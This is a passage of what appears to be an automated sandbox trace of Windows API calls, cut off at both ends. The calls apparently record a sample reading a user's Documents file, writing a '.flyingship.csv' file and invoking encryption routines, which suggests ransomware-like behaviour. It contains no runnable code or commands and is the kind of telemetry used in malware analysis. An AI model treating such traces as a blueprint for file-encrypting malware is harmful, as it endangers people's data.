GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0179.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0179.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0179.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.682] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\rdv9bzzuy is9hirae.flyingship.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.683] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0179.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0179.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0179.684] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.684] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0179.685] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0179.685] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb478, lpOverlapped=0x0) returned 1 [0179.688] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0179.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.688] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb478) returned 0xbea018 [0179.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0179.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb478) returned 0xbf5498 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb478) returned 0xbea018 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0179.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.692] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0179.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb478) returned 0xbea018 [0179.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0179.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb478) returned 0xc00918 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.694] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0179.695] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0179.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0179.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.695] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0179.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0179.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0179.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.696] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0179.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.697] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.698] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0179.699] HeapFree (in: 